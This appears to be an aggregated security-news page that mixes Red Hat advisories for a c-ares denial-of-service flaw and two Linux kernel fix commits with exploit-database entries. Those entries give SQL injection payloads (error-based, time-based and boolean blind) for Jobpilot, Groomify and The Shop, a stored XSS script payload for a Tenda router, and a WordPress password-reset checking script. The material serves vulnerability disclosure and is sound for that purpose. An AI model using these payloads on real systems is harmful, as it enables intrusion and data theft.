Red Hat Security Advisory 2023-3665-01 - The c-ares C library defines asynchronous DNS requests and provides name resolving API. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: c-ares security update  
Advisory ID:       RHSA-2023:3665-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3665  
Issue date:        2023-06-19  
CVE Names:         CVE-2023-32067   
=====================================================================

1. Summary:

An update for c-ares is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

The c-ares C library defines asynchronous DNS (Domain Name System) requests  
and provides name resolving API.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
c-ares-1.13.0-5.el8_1.1.src.rpm

aarch64:  
c-ares-1.13.0-5.el8_1.1.aarch64.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.aarch64.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.aarch64.rpm  
c-ares-devel-1.13.0-5.el8_1.1.aarch64.rpm

ppc64le:  
c-ares-1.13.0-5.el8_1.1.ppc64le.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.ppc64le.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.ppc64le.rpm  
c-ares-devel-1.13.0-5.el8_1.1.ppc64le.rpm

s390x:  
c-ares-1.13.0-5.el8_1.1.s390x.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.s390x.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.s390x.rpm  
c-ares-devel-1.13.0-5.el8_1.1.s390x.rpm

x86_64:  
c-ares-1.13.0-5.el8_1.1.i686.rpm  
c-ares-1.13.0-5.el8_1.1.x86_64.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.i686.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.x86_64.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.i686.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.x86_64.rpm  
c-ares-devel-1.13.0-5.el8_1.1.i686.rpm  
c-ares-devel-1.13.0-5.el8_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJCi3dzjgjWX9erEAQhekA/+Kf1uGXbkxvv+xsdJnq+l52nR502WaIkD  
eKnu3niqW/ZarvBJZRibDUTmM2NIX7D49SPO5WmR/KcPGnkqh4B+TC+TinMOiopi  
KnMnugqL/ABB0zEQekuwCFpBxOxn4pSNNADJeu1mTo8Zoun/6cMhXtBNF9Miesuv  
Ff9y1jNBwOyX5cMgQLuGEVcB0MOsZmWt/nA5kcL72rI0EUQme/+P194jh6RdmzbV  
bHE4IVCF71Xmz3tTItgcs9O0igzKLh3wdM3Kts89SX/WQRjBwS/pRV2d66Q59ySg  
qcsBZMR0Isn+8EyzWwlj4UjXrSCVayu9KoBAVX/Pq8cXJyBbIKoPh9YL4/AcegvX  
xZDkLMdQqxXTnj8uwY+TFTOtATrvMXpJp9WMS7HeGwvkdO4Enm1vyrPNinK8ERCH  
F6Mc0eLOFHn1p9rCPM6FhT27bOX0YZw59PIQxiszGihKojfLqxy6dv5cS8L7Yaiw  
kP0Eed2e9j3wDm7bvpy/u7hZ7det+/uUp5PAd3Bvk+VW8WMu4oU4iLkac9zFhyOI  
QG1q6YAvkEepzo/X2WzcA7NKBUHKMSXhk5K7hD3LBJEpXObLmksE34QCs20dKxsd  
Nm+DH4QtkXhAik1Irrnw5+pa0tdr9RDVfz1fp0wtFn7sDz7Rkn7dIBOtqhudxSOj  
P1vqcBWcX+I=  
=2MFa  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3665-01

WordPress Theme Medic theme version 1.0.0 suffers from having a weak password recovery mechanism for the forgot password flow.

    # Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password# Dork: inurl:/wp-includes/class-wp-query.php# Date: 2023-06-19# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html# Version: 1.0.0 (REQUIRED)# Tested on: Windows/Linux# CVE: CVE-2020-11027import requestsfrom bs4 import BeautifulSoupfrom datetime import datetime, timedelta# Set the WordPress site URL and the user email addresssite_url = 'https://example.com'user_email = 'user@example.com'# Get the password reset link from the user email# You can use any email client or library to retrieve the email# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'with open('password_reset_email.html', 'r') as f:    email = f.read()    soup = BeautifulSoup(email, 'html.parser')    reset_link = soup.find('a', href=True)['href']    print(f'Reset Link: {reset_link}')# Check if the password reset link expires upon changing the user passwordresponse = requests.get(reset_link)if response.status_code == 200:    # Get the expiration date from the reset link HTML    soup = BeautifulSoup(response.text, 'html.parser')    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')    print(f'Expiration Date: {expiration_date}')    # Check if the expiration date is less than 24 hours from now    if expiration_date < datetime.now() + timedelta(hours=24):        print('Password reset link expires upon changing the user password.')    else:        print('Password reset link does not expire upon changing the user password.')else:    print(f'Error fetching reset link: {response.status_code} {response.text}')    exit()

WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism

Tenda AC6 AC1200 version 15.03.06.50_multi suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored Cross-Site scripting in the Tenda router via the deviceId parameter in the Parental Control module# Google Dork: None.# Date: Aug-30-2022# Exploit Author: 0x783# Vendor Homepage: https://tendacn.com/default.html# Software Link: https://www.tendacn.com/product/download/AC6.html# Version: AC6 AC1200 Smart Dual-Band WiFi Router - V15.03.06.50_multi# Tested on: Linux 5.15.0-58-generic# CVE : CVE-2022-40010-------------------------------------------------------------------------# 1. Technical Description:Tenda AC6 AC1200 Smart Dual-Band WiFi Router V15.03.06.50 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the deviceId parameter in the parental control section.# Steps to reproduce:1- Navigate to the router webserver usually at "http://192.168.0.1", or whatever the address of the router is.2- Navigate to the parental control section from the side bar.3- Add a new device to the list with any fake MAC address, device name, URL.4- Intercept the request using burpsuite and change the "deviceId" parameter to any javascript code (EX: <script>alert(document.domain")</script>).5- A pop-up with the domain should appear.

Tenda AC6 AC1200 15.03.06.50_multi Cross Site Scripting

Jobpilot version 2.61 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Jobpilot v2.61 - SQL Injection# Date: 2023-06-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822# Demo Site: https://jobpilot.templatecookie.com# Tested on: Kali Linux# CVE: N/A----- PoC: SQLi -----Parameter: long (GET)    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT(ELT(4894=4894,1))),0x71786b7171)) AND(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CALFire Contract Counties, California, UnitedStates&category=&price_min=&price_max=&tag=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CALFire Contract Counties, California, UnitedStates&category=&price_min=&price_max=&tag=

Jobpilot 2.61 SQL Injection

Groomify version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Groomify v1.0 - SQL Injection# Date: 2023-06-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor:https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114## Demo Site: https://script.bugfinder.net/groomify# Tested on: Kali Linux# CVE: N/A### Vulnerable URL ###https://localhost/groomify/blog-search?search=payload### Parameter & Payloads ###Parameter: search (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf)AND 'rszk'='rszk

Groomify 1.0 SQL Injection

The Shop version 2.5 suffers from a remote SQL injection vulnerability.

    # Exploit Title: The Shop v2.5 - SQL Injection# Date: 2023-06-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/the-shop/34858541# Demo Site: https://shop.activeitzone.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /api/v1/carts/add HTTP/1.1Content-Type: application/jsonAccept: application/json, text/plain, */*x-requested-with: XMLHttpRequestx-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4Referer: https://localhostCookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7Content-Length: 81Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}### Parameter & Payloads ###Parameter: JSON qty ((custom) POST)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)END))","temp_user_id":null}    Type: time-based blind    Title: MySQL > 5.0.12 OR time-based blind (heavy query)    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNSC)","temp_user_id":null}

The Shop 2.5 SQL Injection

An update for c-ares is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-32067: A vulnerability was found in c-ares. This issue occurs due to a 0-byte UDP payload that can cause a Denial of Service.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

发布：

2023-06-20

已更新：

2023-06-20

**RHSA-2023:3677 - Security Advisory**

*   概述
*   更新的软件包

**概述**

Important: c-ares security update

**类型/严重性**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**标题**

An update for c-ares is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**描述**

The c-ares C library defines asynchronous DNS (Domain Name System) requests and provides name resolving API.  

Security Fix(es):  

*   c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**受影响的产品**

*   Red Hat Enterprise Linux Server - AUS 8.4 x86\_64
*   Red Hat Enterprise Linux Server - TUS 8.4 x86\_64
*   Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.4 ppc64le
*   Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.4 x86\_64

**修复**

*   BZ - 2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

**参考**

*   https://access.redhat.com/security/updates/classification/#important

**Red Hat Enterprise Linux Server - AUS 8.4**

SRPM

c-ares-1.13.0-5.el8\_4.2.src.rpm

SHA-256: 90a3c3dd691f7141edba7a3972c74e3971320561882d712a30ae4703a8a9092f

x86\_64

c-ares-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: aaa6839acd7f3974361a8456cb92bb4a09903d6a0eb77900342fe671b8badae5

c-ares-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: 5b35a9dd0d6792af131686a0cf21999eef240da184a539054f2490826525353a

c-ares-debuginfo-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: 85d5d74b2a2c364d854e4bdad5e4f83917e8606029210dcf255d4d721d091bfb

c-ares-debuginfo-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: 8f34855afe48f67a308abbd96193af2e7b8f4bd5bf0d8bb6ea1db7170e5c4b0b

c-ares-debugsource-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: ce6499fe43e1df59dce4213eee7175ac838e4324bb5f39317858fa33d82b85e6

c-ares-debugsource-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: d7e3b4ac261ed8e4b771d3fac7dde69ca9c29d477c6b5935a7f80b99b7523859

c-ares-devel-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: f41dde6f0e453edcabaa40082bd3391c68094624d9071ef2446e676be9c7c2c3

c-ares-devel-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: eb109a41cf0749ea34871245f11b536e70b1c3db558bc18e7b4d6c30d5aedbbd

**Red Hat Enterprise Linux Server - TUS 8.4**

SRPM

c-ares-1.13.0-5.el8\_4.2.src.rpm

SHA-256: 90a3c3dd691f7141edba7a3972c74e3971320561882d712a30ae4703a8a9092f

x86\_64

c-ares-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: aaa6839acd7f3974361a8456cb92bb4a09903d6a0eb77900342fe671b8badae5

c-ares-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: 5b35a9dd0d6792af131686a0cf21999eef240da184a539054f2490826525353a

c-ares-debuginfo-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: 85d5d74b2a2c364d854e4bdad5e4f83917e8606029210dcf255d4d721d091bfb

c-ares-debuginfo-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: 8f34855afe48f67a308abbd96193af2e7b8f4bd5bf0d8bb6ea1db7170e5c4b0b

c-ares-debugsource-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: ce6499fe43e1df59dce4213eee7175ac838e4324bb5f39317858fa33d82b85e6

c-ares-debugsource-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: d7e3b4ac261ed8e4b771d3fac7dde69ca9c29d477c6b5935a7f80b99b7523859

c-ares-devel-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: f41dde6f0e453edcabaa40082bd3391c68094624d9071ef2446e676be9c7c2c3

c-ares-devel-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: eb109a41cf0749ea34871245f11b536e70b1c3db558bc18e7b4d6c30d5aedbbd

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.4**

SRPM

c-ares-1.13.0-5.el8\_4.2.src.rpm

SHA-256: 90a3c3dd691f7141edba7a3972c74e3971320561882d712a30ae4703a8a9092f

ppc64le

c-ares-1.13.0-5.el8\_4.2.ppc64le.rpm

SHA-256: a480b5ff874e42144c1452edfd2d90cc85365b62e2e6014c0274db6d1cb5853d

c-ares-debuginfo-1.13.0-5.el8\_4.2.ppc64le.rpm

SHA-256: 4047f98ea2fb5263f27c33c23d2a0323fd3b1fac43a1da4db21305fd72b32a2e

c-ares-debugsource-1.13.0-5.el8\_4.2.ppc64le.rpm

SHA-256: 04071ec5e67eaf5f6478286be379afcc3da999cb2edc343897ceb97b1e583bd7

c-ares-devel-1.13.0-5.el8\_4.2.ppc64le.rpm

SHA-256: 1b4bda55ac4dba50d572af54a8cf1f28de5f318431a0ebd02ef5e59a35a08a61

**Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.4**

SRPM

c-ares-1.13.0-5.el8\_4.2.src.rpm

SHA-256: 90a3c3dd691f7141edba7a3972c74e3971320561882d712a30ae4703a8a9092f

x86\_64

c-ares-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: aaa6839acd7f3974361a8456cb92bb4a09903d6a0eb77900342fe671b8badae5

c-ares-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: 5b35a9dd0d6792af131686a0cf21999eef240da184a539054f2490826525353a

c-ares-debuginfo-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: 85d5d74b2a2c364d854e4bdad5e4f83917e8606029210dcf255d4d721d091bfb

c-ares-debuginfo-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: 8f34855afe48f67a308abbd96193af2e7b8f4bd5bf0d8bb6ea1db7170e5c4b0b

c-ares-debugsource-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: ce6499fe43e1df59dce4213eee7175ac838e4324bb5f39317858fa33d82b85e6

c-ares-debugsource-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: d7e3b4ac261ed8e4b771d3fac7dde69ca9c29d477c6b5935a7f80b99b7523859

c-ares-devel-1.13.0-5.el8\_4.2.i686.rpm

SHA-256: f41dde6f0e453edcabaa40082bd3391c68094624d9071ef2446e676be9c7c2c3

c-ares-devel-1.13.0-5.el8\_4.2.x86\_64.rpm

SHA-256: eb109a41cf0749ea34871245f11b536e70b1c3db558bc18e7b4d6c30d5aedbbd

Red Hat 安全团队联络方式为 secalert@redhat.com。 更多联络细节请参考 https://access.redhat.com/security/team/contact/。

RHSA-2023:3677: Red Hat Security Advisory: c-ares security update

A flaw was found in the IPv6 module of the Linux kernel. The arg.result was not used consistently in fib6_rule_lookup, sometimes holding rt6_info and other times fib6_info. This was not accounted for in other parts of the code where rt6_info was expected unconditionally, potentially leading to a kernel panic in fib6_rule_suppress.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

ipv6: Use result arg in fib\_lookup\_arg consistently

arg.result is sometimes used as fib6\_result and sometimes used to
hold the rt6\_info. Add rt6\_info to fib6\_result and make the use
of arg.result consistent through ipv6 rules.

The rt6 entry is filled in for lookups returning a dst\_entry, but not
for direct fib\_lookups that just want a fib6\_info.

Fixes: effda4d ("ipv6: Pass fib6\_result to fib lookups")
Signed-off-by: David Ahern <dsahern@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>

*   Loading branch information

CVE-2023-3022: ipv6: Use result arg in fib_lookup_arg consistently · torvalds/linux@a65120b

A vulnerability was found in drivers/cpufreq/qcom-cpufreq-hw.c in cpufreq subsystem in the Linux Kernel. This flaw, during device unbind will lead to double release problem leading to denial of service.

@@ -43,7 +43,6 @@  struct qcom\_cpufreq\_soc\_data {
 
 struct qcom\_cpufreq\_data {
 	void \_\_iomem \*base;
\-	struct resource \*res;
 
 	/\*
 	 \* Mutex to synchronize between de-init sequence and re-starting LMh
@@ -590,16 +589,12 @@  static int qcom\_cpufreq\_hw\_cpu\_exit(struct cpufreq\_policy \*policy)
 {
 	struct device \*cpu\_dev = get\_cpu\_device(policy->cpu);
 	struct qcom\_cpufreq\_data \*data = policy->driver\_data;
\-	struct resource \*res = data->res;
\-	void \_\_iomem \*base = data->base;
 
 	dev\_pm\_opp\_remove\_all\_dynamic(cpu\_dev);
 	dev\_pm\_opp\_of\_cpumask\_remove\_table(policy->related\_cpus);
 	qcom\_cpufreq\_hw\_lmh\_exit(data);
 	kfree(policy->freq\_table);
 	kfree(data);
\-	iounmap(base);
\-	release\_mem\_region(res->start, resource\_size(res));
 
 	return 0;
 }
@@ -718,17 +713,15 @@  static int qcom\_cpufreq\_hw\_driver\_probe(struct platform\_device \*pdev)
 	for (i = 0; i < num\_domains; i++) {
 		struct qcom\_cpufreq\_data \*data = &qcom\_cpufreq.data\[i\];
 		struct clk\_init\_data clk\_init = {};
\-		struct resource \*res;
 		void \_\_iomem \*base;
 
\-		base = devm\_platform\_get\_and\_ioremap\_resource(pdev, i, &res);
+		base = devm\_platform\_ioremap\_resource(pdev, i);
 		if (IS\_ERR(base)) {
\-			dev\_err(dev, "Failed to map resource %pR\\n", res);
+			dev\_err(dev, "Failed to map resource index %d\\n", i);
 			return PTR\_ERR(base);
 		}
 
 		data->base = base;
\-		data->res = res;
 
 		/\* Register CPU clock for each frequency domain \*/
 		clk\_init.name = kasprintf(GFP\_KERNEL, "qcom\_cpufreq%d", i);

CVE-2023-3312: cpufreq: qcom-cpufreq-hw: fix double IO unmap and resource release on exit

Red Hat Security Advisory 2023-3662-01 - The c-ares C library defines asynchronous DNS requests and provides name resolving API. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: c-ares security update  
Advisory ID:       RHSA-2023:3662-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3662  
Issue date:        2023-06-19  
CVE Names:         CVE-2023-32067   
=====================================================================

1. Summary:

An update for c-ares is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The c-ares C library defines asynchronous DNS (Domain Name System) requests  
and provides name resolving API.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
c-ares-1.13.0-6.el8_6.1.src.rpm

aarch64:  
c-ares-1.13.0-6.el8_6.1.aarch64.rpm  
c-ares-debuginfo-1.13.0-6.el8_6.1.aarch64.rpm  
c-ares-debugsource-1.13.0-6.el8_6.1.aarch64.rpm  
c-ares-devel-1.13.0-6.el8_6.1.aarch64.rpm

ppc64le:  
c-ares-1.13.0-6.el8_6.1.ppc64le.rpm  
c-ares-debuginfo-1.13.0-6.el8_6.1.ppc64le.rpm  
c-ares-debugsource-1.13.0-6.el8_6.1.ppc64le.rpm  
c-ares-devel-1.13.0-6.el8_6.1.ppc64le.rpm

s390x:  
c-ares-1.13.0-6.el8_6.1.s390x.rpm  
c-ares-debuginfo-1.13.0-6.el8_6.1.s390x.rpm  
c-ares-debugsource-1.13.0-6.el8_6.1.s390x.rpm  
c-ares-devel-1.13.0-6.el8_6.1.s390x.rpm

x86_64:  
c-ares-1.13.0-6.el8_6.1.i686.rpm  
c-ares-1.13.0-6.el8_6.1.x86_64.rpm  
c-ares-debuginfo-1.13.0-6.el8_6.1.i686.rpm  
c-ares-debuginfo-1.13.0-6.el8_6.1.x86_64.rpm  
c-ares-debugsource-1.13.0-6.el8_6.1.i686.rpm  
c-ares-debugsource-1.13.0-6.el8_6.1.x86_64.rpm  
c-ares-devel-1.13.0-6.el8_6.1.i686.rpm  
c-ares-devel-1.13.0-6.el8_6.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJBO/NzjgjWX9erEAQgRpg//WQjN7RY+rAztCBocuoVgyDDw5Mlr+j4a  
uFVMFcNacTHfb3LJUcbqwSHddSjvh/gantYuc71EUifiRd+SaGb8YWBP6VpL84Xh  
QRO6hyWRSMH4TT8k2AjycR602VV61N9PfZRuKySDL6Qrwq8FxAou3h+Rq2DWN9as  
Eq2QTipj/qomEtF9Jtl3CY3ouAG8Es/TP7q0X9PFY1RrKH2bqt6Cuck8dM0+NvKj  
glT0nIAujoamsqbKbEEUrEimEMTSTZhMxY+HQlDKX18Zgf8egV2TERyYXcVrOp6o  
2AHMqbc4CJL1mn+C8Q6Lbgpn1cbZ/xo8yoIw43EfbziMmlrefWoT1vT1z4p2TiWs  
2vogVce0B/yh2izVyO+LA6lIe+60W50OHSam69MEh3puLndgaE3FLjUUB/D7smjG  
RjKnJBUHiGrq7+EHjctGKGD33t9/iw7RRdIsrXDE+Mf9Ez2/PIiBKfSKKAiWSf0u  
hRzQbMX5Uul+AoPDa3xBBcNRIQx6pZhTew9zK2r39BLg4rvqEfzChEJDHbGtO0cH  
q3LF5+7KJheWv0zPLd7gUBu01XD9ec+d5E4ewJpEZR+DfEMoDmlVZdS+f1IACtZC  
CsRVsFS0IMFJCxUuc4C2aSYtUoDJ+5X905DyuXc6KfqUIeQFpmiA2sUjll87q7Zi  
cuooXmznn8A=  
=nNv8  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux